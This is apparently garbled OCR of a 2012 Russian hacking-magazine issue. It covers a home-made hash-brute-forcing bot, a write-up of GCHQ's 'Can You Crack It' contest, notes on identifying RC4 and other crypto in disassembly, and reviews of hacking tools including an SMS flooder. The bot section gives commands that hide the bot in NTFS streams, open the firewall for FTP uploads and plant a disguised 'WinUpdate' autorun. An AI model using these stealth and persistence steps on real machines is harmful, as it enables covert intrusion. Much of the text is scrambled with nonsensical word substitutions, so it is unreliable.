сего выполняется инспектирование IР-адресов на базе [можно присвоить специальный идентификатор каждой машине, тот или иной симпатия короче

ХАКЕРСКИЕ ФИЧИ Теперь перейдем ко оптимизации нашего самопального комплекса .

отправлять весь круг раз, с намерением распознать в лоне лицом ха сты,

Во-первых , брутер, кавасаки равно библиотеку дозволено запаковать во нераздельно

находящиеся следовать NAT), затем что такое? во базу добавляются те адреса,

экзешник, притом так, аюшки? судебное дело функционирования бота довольно

которые никак не были на ней найдены. Их позволяется изгонять на панели

невидимым, в таком случае поглощать рента неграмотный хорэ видно.

управления ботами. Но получай оный случай, буде кавасаки сделано брутит равным образом немо­

Для сего дозволено nрибегнуть для подручным средствам, а особенно

жет отстучать, который возлюбленный живой, позволительно как и произвести на таблице

со вместе с тавить кофта следующего содержания:

колонка

нужно не без; колебать софтин ко у ВАТ То ЕХЕ Conveгteг

lastcallback . Там

отображается число, которое указывает,

%CD%\bot.exe. Далее 1.5 равным образом скомпилировать

когда-никогда лодка отстучал на nоследний раз. Таким образом, присутствие каждом

во ней таковой батник, эскизно указав во настройках invisiЫe

обращении ко серверу зто авторитет обновляется.

application да выбрав сверху вкладке include три файла: bot .exe, теку [php5ts.dll) равным образом самолично консольный брутер [md5.exe).

Если оно лишше 000 [дефолтный пятиминутный интервал отстукивания бота), в таком случае сие значит, ась? ботик работает не так — не то находится

библио­

Программка создаст безраздельно файл, гегемонящий на фоновом режи­

во офлайне. Затем нужно образовать иразер конфигов. Конфиг, во вкусе

ме . Затем дозволено содеять так, чтоб скрывались равно самочки файлы . Для

ты, возможно, заметил за вышеприведенным кускам кода, состо­

сего убирать порядочно способов. Вотан изо них- это, например, про­

ит изо двух частей, объединенных наслышан

0.

стое приложение штатной виндавай софтины attгib от флагами

Первая доза отвечает следовать команду, которую nолучает бота,

'+h ' равно '+s'. При мер:

а вторая- вслед за дополнительные данные, нужные про исnолнения

этой команды. Чтобы принести команду нате установку, пишущий сии строки должны

attrib "%CD%\bot.exe" +h +s

выслать несколько слыхать iпstalllvocab_123123123.txt, идеже iпstall­ этo бригада установки бота, а

vocab_123123123 .txt-

сие обложка

словаря, кто следует установить. Мы в свой черед можем прочистить всё-таки

Такая общество скроет равным образом сделает системным выше- обложка бота. Спрятать обложка во потоках

NTFS

одну крошку сложнее:

рабочая сила файлы, попросту удалив их,- с целью сего достанет по­ слать команду

clean.

Ну равным образом самая главная команда- сие bгute.

Второй параметр этой команды объединяет хеш равным образом чтобы б рута

cd "%systemroot%\system32 type packed_bot.exe>calc.exe:bet.exe

не без; через двоеточия:

Запуск подле этом осуществляется также из через батника: brute)c4ca4238aeb92382edccse9aбf75849b: c81e728d9d4c2fб3бfeб7f89cc14862c:eccbc87e4b5ce2fe28Зe8f

d9f2a7baf3 Все результаты заливаются получи ПР-сервер, какой-никакой находится там же, идеже равно фокус управления . Попадает всё сие занятие во папку

cd "%systemroot%\system32 start .\calc.exe:bet.exe Наш обложка во томище числе загружает результаты сверху FТР. Файервол

Windows

может нате сие браниться , оттого попробуем его обойти:

гesults. Для того так чтобы прикинуть во базу готовые результаты, кавасаки <<дер­

гает» скрипт из передачей параметра

iamfinished.

С криnт сервера

passthru( 'netsh firewall add allowedprogram %WINDIR%\ system32\ftp.exe TCPinfrastructure>nul 0>&1 ' ); Авторан интересах нашего ехе [если симпатия лежит, например, в % systemгoot % ):

passthru( 'reg add HKLM\software\microsoft\windows\ currentversion\run /v WinUpdate /t REG_SZ /d %WINDIR%\packed_bot.exe /f>nul 0>&1' ); ЗАКЛЮЧЕНИЕ В РНР хоть залейся функций, предназначенных на создания нехи­ лого файлового менеджера сиречь но простого системного помощника . Я надеюсь, зачем по причине моей статье твоя милость убедился отнюдь не только в этом, да вдобавок равно на том, что-то для того автоматизации процесса суще­

ствует много различных средств , которые возле совместном

Рабочий лодка

ХАКЕР

03/158/20 02

использовании могут очень тебе помочь.::;:

065


plaintext lfi rst!a plaintext.su, http://www.plaintext.sul ·

can cra 8t' 1• РЕШЕНИЕ ЗАДАНИЙ ДЛЯ ХАК-КОНКУРСА, УЧРЕЖДЕННОГО

УПРАВЛЕНИЕМ

ПРАВИТЕЛЬСТВЕННОЙСВЯЗИ ВЕЛИКОБРИТАНИИ

Недавно Управление правительственной сношения

Великобритании объявило нищенский

Н-конкурс, воеже втянуть для себя внимание к а ко ко работодателю . Не уверен, что-нибудь для ним кто­ то устроился в работу, да пройт да задания с

На нашем диске ты смож ешь найти видео из полным прохождением

конкурса « Сап

You

Cr ack lt?».

спортивного интереса беспременно захотели многие .

.PNG .......IHDR. .............j .-•... sRGB ......... pHYs ................. tiME. .. .. . 0-9.p ... )iТXtComment ..... QkJCQjiAAACR2PFtcCAбq2eaCBSR+BdmD/zNzLQC+td3tFQ4q x8044 7ТDeuZwSP+{)SsDEcYR.78J KLW=2 ...... IDATx ... yt .... лcwuW... So-.. ,....... L.. l!!> ... q .. 08.. 0.. a.7.,. НV.y.&.:. G.a ...... mMH.d ......\ .U... ?.n7-Ktuwi ... Gj.R. ..... g.} .. .. sн. д .... sн . д.... sн . д .... sн . д .... sн . д .... sн . д.... sн . д .... sн. д.... sн. д .. .

.sн . д.... sн . д. ... sн . д.... sн . д.... sн . д .... sн . д. ........o.. u.... во :. Lz . D .. I!!>.B c.... .l.4.. ) .... • -....... d .. !QZ. •-ее. D, .. ,.. q.R.fc.. & .•w41r... Ra6... 0...:... ".. } .D.r..https://issuu.com/14.% ....... D<. D " s .i A.ТX, .. ZD .... $....... лX. .. 0.. ·.C.9y.i ...V... ,MO.. G.B y .... B .......... (<.C.. q .. X.Di .. 0M .....f{... Sv; .. (... 0.H.&'.}}y.j....... 0.. BQ.. !. .... zz.... t..jM&...... К. .. s% .... f .. nW.... X.fH .... s.. k .. h.vmm-' .._y: :.' p.6... djSK ............. R. .. R.. 0. Q.... >..... <....... bH ...... C.1 ... t) . .........-.UX,.%K11!> ..

Задани е первого этапа

066

Комментарий ко файлу из заданием

ХАКЕР

03/158/2012


0

Итак, некоторое промежуток времени отступать Управление

ячейка конца выше- е го кода, указываю щишки й, идеже

void

правительовенной маза Великобритании

со держит ся значе ни е ОхАААААААА. Д алее

{

об ъявило конкурс, успешное ради хож д ение

с стека с влека ется

DWORO,

нивается из ОхАААААААА. Затем извлекается

свое резюме, а кроме равным образом определиться в работу

е ще в отношении дн в отношении з начени е, ко тор ое срав нив ае т ся

во брита н скую киберразве д ку . Пр едложе нны е

не без; О х ВВВВВВВВ . Однако сего куска дан ных

вслед за дания н е приблизительно полоз сложны, д а равным образом саму стра­

!второй половины стека функции] у нас нет.

ницу отдела к~дров Управления правитель­

функции , необ хо партия насчёт соблюсти впадина тин ку со за­

махом обнаружи ть возле п омо суп пои сков да ко а

дани е м со ущелье та да п осмо третья часть , в духе каста ипостась

Google,

одначе данный встреча всё но интере­

сен , приближенно на правах некто позволяет отдать справедливость у ровень

около г отовки сотрудников, ко т орые соста вля­ ли задания.

На странице ко нк урса, находящейся в области

iTXt РNG-файла не без; вслед за ­ данием ! ко диров ка UTF-8]. Бинарные д анные закодированы вместе с п омо щью алгоритма Base64 и следуют вслед за сло во ом Comment !смотри рисунок].

}

Раскодировав равным образом склеив дв а бинарника, моя персона за­

v1 v2 do

ния, что представляет на вывеску следующую

ствующий рисунок] да надпись-дразнилку «Сап

строку:

Сгасk

lt?>>.

l~hile

спервоначала подумал, что-то сие ради шифрованное по­

GET

/ 05b43бde1f9187f3778aad525e5d8b28 .js

ASCII,

одначе у меня

ничто безграмотный вышло. В итоге моя персона решил втиснуть однако

НЕХ-значения вместе с рисунка на бинарный фай л и открыть полученное похабень во

IDA

Рг относительно . В

После ото п равки соот во е т ствующе г относительно

GET-

зanpoca н а сервер получаем во-вторых вслед за дан ие.

Кстати, ко д не возбраняется запус тить нескольки­ ми из п особами. Я создал безыскусный ехе -фа йл, в котором первоначально считывается кусочек заключение из

таты.

из-за верно нием, а налет ом всё э т об д ело запускается держи

распознал осмысленные куски

заключение на архитектуры х86 . Я п что до нял , ч т что до выбрал

создавание ! п од ко н тро л ем

регулярный п у ть.

бесхитростный ассемблерной вставки:

IDA] около помощник ощ да

OxDEADBEEFu; +

v1 ;

( (_BYTE ) vO ) ; sub_39 (); } Результат декомпиляции

нием. Д ля сего отнюдь не нужно ведать границы

PNG,

а шабаш без труда существовать внимательным !не­

Недолго думая , ваш покорный слуга преобразовал паркет уче н­ ный часть заключение на функцию равно запустил д еком­

=

l~hile

итоге ми посчастливилось паркет вколачивать кое-какие рез ул ь­

IDA усилий

( (_BYTE ) vO ); о;

}

НТТР / 0 . 0

мости каждого зна чения равным образом попытался а там

отправить их на символы

0;

LOBYTE ( v1 )=v2 + v4[ v0 ] v2=ROR __ ( v2 , 0); v3=v4[ v1 ]; v4 [ v1 ]=v4[ v0]; v4[ vO ]=vз ; lOBYTE ( vO )=vO + 0;

Уви д е во сии Н ЕХ-значения, автор этих строк

слание, начал было пересчитывать частоту встречае­

+

{

пустил адрес нате воплощение !под отладчиком] и пр осмотрел рез ультат пр что до ц е д уры дешифрова­

You

v4[ v0 ]=vO ; lOBYTE ( vO )=vO

усишко тро е держи . Недостающие д анные со держатся на

от набором НЕ Х - з начений !смотри соответ­

о;

{

дополнительной секции

адресу caпyou cг ackit . co . uk , ты да я видим картинку

cdecl sub_O()

vo do

Чтобы раскопать вторую половин у стека нашей

овенной взаимоотношения IGCHQJ позволено пр акти ч ески

itl

int vo ; // есх@1 int v1 ; // еах@З unsigned int v2 ; // еdх@З char vз ; // bh@4 char v4[256] ; // [sp+Oh] [bp-100h]@2

тот или иной срав­

которого п холм воляло послать на У власть

не без; ап сгасk

обходима автор этих строк сообщение со держится во самом

начале файла].

_ asm

пилятор. Сначала во стеке вам деля ется место под скопление на

056

байт, тот или другой заполняется

значениями через О давно

055,

а дале е вып касательно лняется

проце д у ра преобразования массива, которая

int 0;

mov call

SECOND STEP

nрограммная знак останова

еах,

еах;

array; ar ray -

скопление

со

кодом

заnус для для хвала в выnол нение

познать набросать эмулятор микро­ nроцессора . Дан отрывок памяти со кодом да

сверху са мом д с грехом пополам пре д не без; т авляет на вывеску алгорифм

инициализации шифра RC4 не без; ра зме кашаса блока 8 двоичная единица информации да для люч ом OxD EADBEEF !смотри рисунок] .

Во втором задании а вт оры предлагают нам

данными, а опять же описана структура

Хочу отме т ить, сколько на начале стих прои схо ­

микропроцессора, в целях которого вс ё сие

После всего делов сего вызывается вновь одна функ­

дит jmp при помощи четверик !вроде бы] неиспользуе­

предназначено . Процес мусор состоит с

ция, плеть которой испорчен, равным образом поэтом у насчёт н а безграмотный

мых байта. Э ти фошка байта пр притеснение дя тся нам на

сообразно зубам декомпилятору.

дальн ейшем. Как видишь, на первом месте урок до­

восьми регистров, цифра с которых !гО ... гЗ] представляют собою регистры общего на­

раздольно для вместе с тое. Затруднения возникли чуть

значения, двушничек предназначены с целью хра нения

Как оказалось, на начале следующий функ­ ции достоинство регистра

esp,

содержащего

указа тель нате вершину стека, меняется получай

около об нар сделано нии следующий части вместе с тека функции

адреса сегме нта стих да а др еса сегмента

во дополнительной секции РNG -файла со зада-

данны х ics равным образом ds соо тв е т ственно], касательно д ан ре-

printf ( ''\nkeygen .•xe\n\n'' ); if ( ~1 •• 0 ) (

uS • ( FILE • ) f ope n6 0("'license.txt" . ''r" );

if ( us ) ( MI?IIISet (&U9 0

D.

UNIX CRYPT()

0Jш);

fsc.:.nf ( uS . '"ts'' • r.u9 ); f c lose ( uS ); if ( u9 •• ' qhcg' )

Функция сгурt на операционных системах

{

u2 • crypt (); if ( ! s tr c ~tp ~ ( const char· • ) u2 . ghDTK7b8Kru w) ) U13 • 0;

printf ( "loading stage1 license key(s) .. . \n''); u6 • u10 ;

printf ( "loading stage2 license key( s ) . . . \n\n'' ); u7 • u11 ; u8 • u1 0 ; }

if ( U13 ) (

u4 • Tr ans•itl nfo (•(_DWORD

• )( а2

• lt). ( int )&u 0 );

}

else {

pri ntf ( ''er-ror: licf'nse.txt i nualid\n''); u4 • - 0;

*ni x

подхваченный узел шифрованного текста опять-таки

DES

служит для того хеширования различных данных,

шифруется из через алгоритма

на волюм числе паралей пользователей системы.

Таким образом , устройство изо восьми нулевых байт

равным образом т. д.

Традиционная выполнение этой функции

шифруется на nроцессеработы

использует заатлантический алгорифм

отметить, что-то сгурt малограмотный использует стандартную,

DES (Data

05

единожды . Стоит

Encгyptioп Staпdaгd]. Пароль пользователя

эталонную реализацию алгоритма

сокращается перед восьми символов, ото каждого

Алгоритм отдельный крата сколько-нибудь меняется . Его

с которых, на свою очередь, берется

конкретная материализация зависит с соли длиной

0 бит. 7 двоичный знак формируют 06-битный DES, близ помощи которого

DES.

Восемь наборов сообразно

02

отпирка алгоритма

nреобразуются во строку подле помощи алгоритма

шифруется группа с восьми нулевых байт . Затем

бит. Соль равным образом шифрованный машинопись на итоге

Base64.

Основной функционал программы keygen

ХАКЕР

03 / 058/ 0012

067


хакинг

short loc_6

-------------; :=====-=-=-=-:..::;- ----------------------------·

-------------

dd OAЗBFC2AFh

-

0

-----------------------------------·

loc_6:

; sub xor

сэ:

ОхОО ,

dэ:

OxlO ,

fl :

ОхОО ,

j tirmware:

esp,

000h

есх,

есх

СООЕ

XREF: sub_O!j

[ Oxd2aьlf05 , OxdalЭfllO ] So you did it- приветствие не без; успешным

Неиспользованные значения изо первого да второго заданий

гистр служит в целях хранения флага операции

[flgl, равным образом один- про хранения адреса текущей инструкции [ipl. Микропроцессор обладает набором с

описании задания упоминается престант cs, так а на правах равно г51. Второй повозочный камень -реализация fаг jump'oв равным образом изменения ip.

выполнением заданий

GET /da75370fe15c4148bd4ceec861fbdaa5.exe НТТР/1.0

Здесь прямо-таки потребно знать, что-нибудь значения ре­

восьми инструкций, каждая изо которых [за

гистров, отвечающих следовать подворье сегментов,

Отсылая на очереди GЕТ-запрос для сайту, полу­

исключением инструкции hlt, прекращаю­

изменяются лишь только возле дальних переходах равным образом

чаем третье блюдо вслед дани е - исполняемый файл. При

щей совершение программыl имеет двоечка

никак не изменяются, разве ip начинает направлять

просмотре зависимостей сие го файла видно,

режима работы: mod О да mod 0. В принципе,

для новоявленный раздел заключение . В остальном а всё

что-то интересах его работы необходим Cygwiп. Вообще,

чтобы успешного выполнения задания до­

прямо равным образом прозрачно. Разработчики заданий

на свойствах полученной программы указано,

статочно быть отмеченным небольшими навыками

предлагают нам провести в жизнь эмулятор держи

который нынешнее псевдоним зкзешника keygeп.exe, таково

программирования, а в свою очередь представлять,

языке JavaScгipt, но бери то, довольно ли

который мужественно переименовываем его.

по образу рабо т ают микропроцессоры. Однако на

учтено выполненное задание, извлечение языка

процессе программирования ваш покорнейший слуга наткнулся

программирования никак не влияет. Я реализо­

сом- шифр казаться никак не обфусцирован. При вслед пу­

В оный в один из дней вновь никаких пр облем от ревер­

получи изрядно подводных камней. Сперва пишущий эти строки

ролик эмулятор процессара получи и распишись С. Программа

ске keygeп требует уполномочить ему URL сайта для того

объединил во безраздельно конгломерат регистры общего

выполняется достаточно быстро, хоть у меня

соединения на качестве первого двое метра. Ал­

назначения, а в целях cs равным образом ds выделил отдель­

были подозрения, что такое? разработчики напи­

горитм работы программы шабаш прост: на

ные переменные. Как оказалось, зто оши­

фигляр код, кой довольно делать полчасика :-1 .

текущей дир ектории выполняе т ся пои ск файла

бочный подход, круглым счетом во вкусе во коде встречаются

инструкции вроде «add г[5], 02>>, которые, в соответствии с

После остановки процессара [выполнения инструкции hltl на памяти появится отпирка для

тоже три числа. Судя за строкам на се гменте

замыслу разработчиков задания, изменяют

третьему этапу конкурса - стоит на повестке дня GЕТ­

данных, требуемые числа представляют на лицо

значения сегментных регистров напрямую [в

запрос:

Stage оп е liceпce key да Stage two liceпce key,

licence .txt, с которого считывается строка, а

ВОССТАНОВЛЕНИЕ КРИПТОГРАФИЧЕСКИХ АЛГОРИТМОВ В сегодняшнее период хитро обнаружить

<<заnо дозрить >> оный сиречь некоторый узел заключение во

коммуникационную систему, которая никак не

nринадлежности для какому-либо алгоритму .

ISBo x' ыl, есть такие специфические константы,

использовала бы криnтографию. Часто на

Так, например, современные симметричные

а как и такие nараметры алгоритма, как бы метраж

процессе реверс-инжиниринга различных

блочные алгоритмы шифрования в большинстве случаев

ключей [в волюм числе пикет массива раундовых

модулей необ х одимо различать

построеныпоитерационной схеме, во которой,

ключей!, протяжённость блока, доля итераций

равно восстанавливать используемые

по образу правило, производится перемена значений во

[раундов! равно т. д. Подобными признаками

криптографические алгоритмы, режимы их

соответствииснекоторой таблицей во памяти ,

да обладают равным образом хеш -фун кции. Алгоритмы

работы, nорядок выработки да использования

нало жение ключа шифрования равно линейное

хеширования как правило исnользуют старшие

ключей шифрования равно т. д. Разбор конкретной

реформа . При этом на пределах одной

наборы констант, который облегчает разнюхивание

реализации алгоритма такженередко

функции на ассемблернам листинге может

будто алгоритма да его возобновление .

позволяет безграмотный всего лишь изъявить ее ошибки, хотя

свести знакомство цикл, большое доля

Стоит отметить, что-нибудь во подавляющем

равным образом оnределить, в чем дело? алгорифм исnользуется

инструкций тиnа

mov, movzx , add, хог, shl, shг

большинстве программных реализаций

неnравильно, во результате аюшки? могут

равным образом т. д ., а в свой черед частые обращения для nамяти [в

симметричных алгоритмов шифрования

подниматься уязвимости, nозволяющие во

качестве nримера смотри у меня рисунок!.

ипостась выработки массива раундовых ключей

конечном итоге nровести усnешную атаку бери

Кроме того, пользу кого каждого криптографического

lkey schedulel равно выражение дешифрования/

систему во целом.

алгоритма не грех обратить внимание кое-кто

шифрования открытого текста находятся во

Вообще, универсального рецеnта в соответствии с

<< отличительные внешний вид >> , которые позволяют

разных участках заключение программы . Это помогает

распознаванию криптографических

автоматизировать разглядывание необ х одимых

подогнать nроцесс обработки информации (и

алгоритмов малограмотный существует, позволяется чуть

участков кода. Чаще всего делов такими признаками

далеко не употреблять весь круг разок эпоха да запас в

сделать акцент кое-кто nодходы равно оnисать

служат константы, х арактерные ради того

nолучение

многие nризнаки , которые позволяют

тож иного алгоритма. Для симметричных

алгоритма!.

068

алгоритмов сие могут являться блоки подстановак

key shedule

с основного ключа

ХАКЕР

03/158/ 0012


0са п cra ck it l

Ито г что касается во ый GЕТ-за пр ос для се р ве р у да м еет

в таком случае глотать сие неко т в рассуждении р ые д фактически н ые, дл пишущий эти строки n олучения

которых никуда не денешься урегулировать из-за д ачи , п ре д ла­

вместе с л едую щ ий на равно д :

АЛГОРИТМ

гаемые держи первом равно втором этапах конкурса.

Прочитанная изо файла линия nреобразуется

подле nомощи функции crypt [из Cygwin ) равным образом срав­

RC4

GET / hqDT K 0 b8K2rvw/ A ЗBf C 0A F /D2 AB1F e5/ DA1 0F1 0e/key.txt НТ Т Р / 0. е Алгоритм

нивается вместе с э т алон н ым з н а ч е н ием с сегмен т а

данных программы. Д ойдя д что до э т ого буква n а, мы

Этот интерпелляция позволяет читать обложка

[также изве не без; тен как бы

ARC4)

для

литоринх было nриня-лся рушить хеш с сегмента

key.txt,

данных, всё-таки э т об был тупиков ы й п уть, равным образом на сё

из п эскер д равлением

оказа л линия гораз д по части n р относительно щ е. Н еобхо д имый IР ­

для оп исание вакансии, во ко т насчёт р ом говорите т ся,

Ривесто м , одним изо основателей компании

адресок как видим со использованием перво г что до

что-нибудь конкурсанту, успешно выполнившему всегда

R5A

nараметра программы [UR L сервера) равным образом DNS.

следовать д ания, ни капельки безвыгодный предлагают работу напрямую

ладает рядо м прежде со тоинств , ко которым на первую

Как неприхотливо д ога д аться,

UR L д олжен

п ред­

на котором указан родничек через страни ц ы

RC4

сегодняшни й мол н ь является одним с самых

<<So you did it» равным образом ссы л каковой

известных да во всю ширь используемы х поточных

шифров. Алгоритм был разработан Раном 5ecu гi ty, во далеком

0987

году .

RC4

об­

сейчас, н в рассуждении согласны заслушать его канди­

очер е дь относят со моя особа высокая проворство работы

став пят ь из себя а др йес страницы из следовать безусловно ни ями:

правда т у р у п озже, когд а на У п равлении п оявятся

равно п е ре м енная пикет ключа . На каждом такте

canyouc г ackme . co.uk . Д алее

свободные вакансии.

keygen.exe форми­

работы алгорит м генерирует

рует для удаленному серверу G ЕТ- задание вида:

SUMMARY GET /%s/%e8X/%e8X/%e8X/key .txt

НТТР / 0 .е

Как ваш покорнейший слуга уnоминал ранее, получай месте строки во за­

0 двоичный знак

псевдослу ­

ча йн насчёт й в соответствии с из ледовательно вместе с ти да изменяет из вое вн у треннее вместе с остояние , ко оторое определяется

З тартар анияотУправления п равительствен -

перестанов ко ой значений через О по

утнапиштим маза Великобритании безвыгодный представля-

дву м автор этих строк однобайт н ыми изредка ко сами:

055 [5) и i равным образом j. Алго­

корма не заманить кого куда и калачом ой сложности да во первую черед

рит м

просе имеет смысл хеш-з н ачение изо сегмента данных .

ориентированы возьми проверку смекалки, а еще

инициализаци равным образом [К5А) равным образом алгоритма выработки

Остае т ся только лишь най т равным образом значения <<ли ц ензионных

попозже - навыков реверс-инжинирин г а равно про­

псевдослуча й же й последовательности . Про­

ключеЙ>> п ервого равным образом второ г об э т апов вслед д аний,

граммирования равным образом знаний касательно принципах рабо т ы

цедура инициализации служит с целью выработ­

для того почему ваш покорнейший слуга начал накоплять данные, которые

микропроцессоров. Выполнить сии задания по-под

для равно п е р е становки

для сих этапах неграмотный использовались. На первом

силу любому человеку, у которого довольно

с

этапе сие хорошо байта во начале кода, посредством

терпения равным образом энтузиазма. Это неявно свиде­

псевдо для одом :

котор ы е ш ел п ер во в отношении н ачал ь н ы й

тельс т вует в рассуждении том, ч в таком случае во

jump. Дл автор этих строк

00

RC4

поперед

состоит изо дву х частей : процедуры

056

0

около помощи для люча длиной

бит. К5А описывается из ледующим

GC HQ работают обычные

второ г что до этапа сие нигде неграмотный пригодившееся пара

человек ,

ОWОRО-значения firmware [смотри рисунок).

которые во зрелищных голливудских фильмах

Вообще, изумительный втором задании никак не использовался

взламывают парали ради пару минут да из легкостью

огулом беспристрастный ба н для памяти, кото ры й получай ч равным образом н ае т ся

п ро н икают на из-за щ ищенные путы правите ль вместе с т а

j

от сигна т уры

разных стран. Н апоследок неймется побла г о­

f or i f r om е t o 055 j :=(j + S[ i ] + key[i mod keylength] ) mod 056 swap va lu es of S[i] and S[j] _ endfor

0z,

в рассуждении дн ако безграмотный ваш покорнейший слуга вл яе т ся в рассуждении д ноимен­

everyday heroes, а

неграмотный те супермены,

ным архивом. Этот учас т ок, неграмотный потребовавший­

приносить в дар британцев вслед за сызнова одну возмож н отросток

ся в целях выполнения задания, видимо , нужен

<<размяться» равным образом обследовать близкие навыки . За д ания

прос т относительно д ля того, ч т обы ради п ута т ь конкурса н в таком случае во .

наших спецслужб были бы гораздо хар д ко рн ее. :х:

• •

.

• text :101221121 . text:10122112 .. • text: 000221126 • text :101221129 • text :1 ОО22А2С .text:100221133 • text: 0 00221136 • text :1 0022А38 • text: 0 00221138 • text: 0 002211ЗЕ • text: 0 012211..5 • text :1002211 ..7 • text: 0 002211..8 • text :1 01221152 • text :101221155 • text :100221157 • text :1 012211SA • text : 0 0122ASO • text :1 OI22ASF • text :100221162 • text :100221169 .text:10022116B • text :10022116Е .text : 000221171 .text:100221173 .text :100221176 • text :100221178 .text:10022117B • text: 00122117Е

ROU ROU

shr ROUZX ROUZX

Shl AOU

Shl" AOUZX ROUZX XOI" AOUZX AOUZX

Shl XOI" ROU

shl AOU

Shl" AOUZX XOI" XOI" AOU XOI"

esi. (eax• 0Ch ) есх. esi есх • 00h 0 edx. cl есх. ds:byte_10058188[edx) есх. 0 edx • esi edx. 0 edx. dl edx. ds:ьyte_10058188(edx] есх. edx edx. byte ptr (eax+ 0Ch ] edx. ds:ьyte_10058188[edx] есх. 0 есх. edx edi. (eax+ OCh ) есх. 0 edx. esi edx. 08h edx. ds:byte_100S8188(edx] есх. edx есх.

(еЬр+ О ]

edx.

(еах• 0 ]

есх.

(еах]

add

еьр.

0

XOI" ROU ROU XOI"

edx. есх (eax+ 00h ].

f or i f r om е to 055 S[ i] :=i endfor

:=

е

Алгоритм выработки псевдослучайной последовательности и будет прост .

Он описыва е тся следующим nсевдокодом :

i j

:=

е

:=

е

whil e GeneratingOutput: i :=( i + 0) mod 056 j :=(j + S[ i ] ) mod 056 swap valu es of S[i] апd S[jJ _ К :=S[(S[i] + S[j] ) mod 0;>6] output К endwh i l e Алгоритм

RC4

применяется чтобы шифрования

данных на протоколе

05L, защиты трафика WEP, защиты документов Adobe PDF и Microsoft Office . Широко известны случаи,

во

когда-никогда неправильное исnользование данного

алгоритма позволяло вос вместе с тановить конфи­

денциальную информацию . Так, некоторое время отворотти-поворотти на защиты содержимого

РDF-документов применялея ключа

есх

00

Х АКЕР

03/158/2012

AES

из длиной

ленник был в состоянии надергать посещение для содержимому

есх.

(еах• 0 ]

файла простым перебором ключа . В одной

есх.

edx

изо версий М5

Office RC4

исnользования Кусо для ассе м блерного листин г а алгоритма

RC4

бит, во результате что такое? злоумыш ­

по причине неправильного для защиты файлов пользу кого

нет слов из становления да х содержимого х ватало

069


,.,~,.

(

~ '"r;- -,'

::,

~\ "~,.'

~.:~~~~

* :

r

• ~:---~

относительно

03

00000004 Ноемо бозо .-.кoe.rndЬ Количеста в отношении кееа.:

Оwт

09

Услоои• обробо""' r:t>

02

ДоnусТW<ЫА"'""""'fМ

0


с~ ... ~~ ~ сосорост-.

0898K8i5

Ф,,".,

0021 04

Mys..o

~

020~1

0•

022988

ТВ

0-4е<IОЭ

....

tфт

0~0

приема у квалифицированного специалиста.

Поиск за базе:

+

с==_

обыскивать

Вы nоnали нате самый громадный файловый искатель на рунете . Ищите любые файлы да скачивайте возьми неограниченной скорости с самых больших торрент-трекеров

Попупярные требования :

сайт << Проверка зрения сквозь интернет». Он, естественно, был жуть славно

IV сауз склад камышовая кошка интерны wow аватар кас пере маз патч 0010 GTA Starcraft 0 рок ПрОГраММЫ dVd 0QQ9IOSSieSS ИЛаЯ ре nорно КОМеДИЯ mpЗ sasha grey музыка бесплатно

ссылку, которую выплюнул поисковик, и-

что касается чудо'- сие оказалось то-то и есть то, что-то нужно:

''

кв н friends Fleur lost Dragon дgе crysis прожекrор перис хилтон и дело от концом

Конечно, Ваня испугался, а у страха, вроде из­ вестно, тараньки велики. Ваня ткнул первую но

daemon total

pdf поликлиника фильмы HQ пипец windows 0 HD 020р от колебать dvdrip качество Весёлая усадьба house КаМеДИ

оформлен и, что-то самое главное, предлагал проверить полиопия сейчас сейчас' Ваня быстро нажал «Пройти проверку» да ответил держи во­ просы анкеты, которые ходят слухи должны были выявить, аюшки? а всё-таки произошло со его

глазами. Когда Ваня ответил для постоянно вопросы, сайт сообщил ему, который установка диагноза, вообще-то, платная, однако стоит только по-божески равным образом зачем

Ложный

072

depo si tfiles

к его получения нельзя не назначить особый

ХАКЕР

03/158/2012


Доброго времени суток уважаемые форумчанеl Предлагаю формирование adult платников . в услугу входит : -Установка оживка платникiJ

Целевой сайт

-Настройка категорий -Нарнсовка уникального Лога -Наполнение

-nотключенне ко бнллннrу

А ТliКЖе улица по части каталоrlllм©''


взламывание

Marlicq 084888, http://snipper.rul ·

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ

Автор :

NEOx. URL:

Rro_r_,._,..,..НIIP

"' or тat> •

о'> е

..

Ьit .ly/x 0Lk8n.

--

._ ......

РЕ

Tools- сие

не без;

Q

~ ---~

Система :

полнофункциональная утили-

[64bitl. Она

Автор :

famatech. URL: radmin.ru/products/

SuicideiVII] . URL: rOOt .in/showthread . php?t=18056.

0pscanner.

Windows .

та к работы не без; файлами РЕ /Р Е +

Автор :

Система:

Система :

Windows.

Windows.

Е сли т ы когд а -либо использовал на своей по части ­

П ро га представляет внешне насчет д винутый SМS­

вседне во утнапиштим работе

флуд ер, позво л яющий циркулировать сведения

Radmin,

так советую тебе

содержит на себя следующие мо дули : вычитчик

попробо во ать во деле сызнова одну программу что до т тех

не без; любым текстом . Д лина по отношению д ного СМС стандар­

РЕ- файлов,

а авторов -

тна равно составляет неподалёку

Task

Vieweг, оп т имизатор

Win32

Advanced

0

Р Scanne г. Как яс н об

05

этим на олов нате кирил­

Р Е -файлов, д етек т гам компи л пишущий эти строки т ора/у п аковщика

с названия, п ро га n редставляе т из себя п р касательно ­

лице да

равным образом м н огое другое. Ос н овн ы е возмож н ости про­

дв инутый сетный автосканер .

живается отп ра вка С М С во т акие страны, на правах

г раммы несложно п оражаю т во оображе ни е.

Функционал равно основные совершенства тулзы:

Р оссия, Казахста н , Узбек равно из т а н , Украина. Дл автор этих строк

0.

работы флудера т ребуются ва ли д ные аккаунты

изделие дампов п роцессов [Full, Pa г tial,

вляе т многопоточное сканиро во а н ие со т ен

Maii. Ru.

Regionl;

кусок п ьютеров во сети, дай тебе разыскать такие ре ­

таких аккаунтов. Ты во п ол н е сможешь сыскать

сурсы, в духе общие папки, Н ТТ Р, НТТ РS равно FТР,

раздачи от ними, заре г истриро во ать аккаунты

равным образом получитьдоступ ко ним.

автономно либо — либо а вос п ользоваться од­

Интеграция со

ним изо многих nубличных брутфорсеров сего

эпилог работ ы процесса;

Radmin . Б лагодаря инте­ грации из Radmin, свой автосканер находит все маши н ы из заnущенным Radmin Sегvеги п об ­

погрузка для ц есса на РЕ E ditoг да РЕ Sniffeг;

зволяет спустя время включиться ко ним во нераздельно

описание О ЕР.

возглас . Д ля сего держи компью т ере, не без; которого

mymegaemai l @mail .ru:passw l r u: pas s

0.

.NET CLR-npoцeccoв; Anti Dump

автоматическое аннулирование защиты Pгotection;

0.

версия приорите т а процесса;

РЕ Sniffer:

осущес т вляется сканирование, прежде л а н б ы т ь

оп ре д е л ен равным образом е т да п а для по отношению мп вилайет моя персона т ора/у п аков щ ика;

губы н ов л е н

